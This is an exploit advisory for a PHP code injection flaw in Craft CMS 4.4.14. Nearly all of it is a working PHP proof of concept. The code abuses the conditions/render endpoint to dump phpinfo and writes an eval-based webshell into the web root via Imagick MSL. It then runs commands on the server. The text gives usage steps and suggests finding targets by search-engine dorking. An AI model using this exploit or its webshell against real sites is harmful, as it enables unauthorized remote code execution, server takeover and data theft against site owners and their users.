Headline
Craft CMS 4.4.14 Code Injection
Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Craft CMS 4.4.14 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://craftcms.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit { private $target_uri; private $webshell; private $config = ['upload_tmp_dir' => null, 'document_root' => null]; private $post_param; private $get_param; public function __construct($target_uri, $webshell = '') { $this->target_uri = $target_uri; $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php'; $this->post_param = $this->generateRandomString(1, 8); $this->get_param = $this->generateRandomString(1, 8); } public function check_phpinfo() { // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo() $data = http_build_query([ 'action' => 'conditions/render', 'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition', 'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}' ]); $response = $this->sendPostRequest($this->target_uri, $data); if ($response) { $this->parsePHPInfo($response); } } private function parsePHPInfo($response) { // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) { $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]); } if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) { $this->config['document_root'] = trim($matches[1]); } } public function upload_webshell() { // Generates an XML payload to upload the webshell via Imagick MSL $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> <image> <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" /> <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" /> </image>"; $form_data = [ 'action' => 'conditions/render', 'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition', 'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', 'payload' => $payload ]; $response = $this->sendMultipartPostRequest($this->target_uri, $form_data); return strpos($response, '502') !== false; } public function execute_command($cmd) { // Executes a command on the server via the uploaded webshell $payload = base64_encode($cmd); $data = http_build_query([$this->post_param => $payload]); return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data); } private function sendPostRequest($uri, $data) { $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => $data, ], ]; $context = stream_context_create($options); return file_get_contents($uri, false, $context); } private function sendMultipartPostRequest($uri, $data) { // Sends a multipart form-data POST request $boundary = uniqid(); $delimiter = '------' . $boundary; $post_data = $this->buildMultipartData($data, $delimiter); $options = [ 'http' => [ 'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n", 'method' => 'POST', 'content' => $post_data, ], ]; $context = stream_context_create($options); return file_get_contents($uri, false, $context); } private function buildMultipartData($data, $delimiter) { $post_data = ''; foreach ($data as $name => $content) { $post_data .= "--$delimiter\r\n"; $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n"; $post_data .= "$content\r\n"; } $post_data .= "--$delimiter--\r\n"; return $post_data; } private function generateRandomString($min, $max) { $length = rand($min, $max); return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length); }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) { echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================